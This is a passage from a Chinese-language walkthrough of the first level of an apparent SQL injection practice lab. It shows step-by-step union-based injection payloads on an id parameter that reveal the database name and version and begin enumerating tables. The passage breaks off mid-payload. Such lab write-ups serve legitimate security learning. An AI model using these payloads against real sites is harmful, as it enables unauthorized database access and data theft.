2021.9.29
第一关
?id=1
无报错,那加个引号试试
?id=1'
出现下面的报错
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
可以看出是字符串,继续测试
?id=1' order by 4 --+
测试出共3列,–用于注释后面的语句,+为空格
?id=1' union select 1,database(),version() --+
发现无回显,尝试错误id
?id=1234567' union select 1,database(),version() --+
得到数据库名:security,版本号:5.5.53
利用information_schema.tables查出该数据库的表
?id=1234567' union select 1,group_concat('----'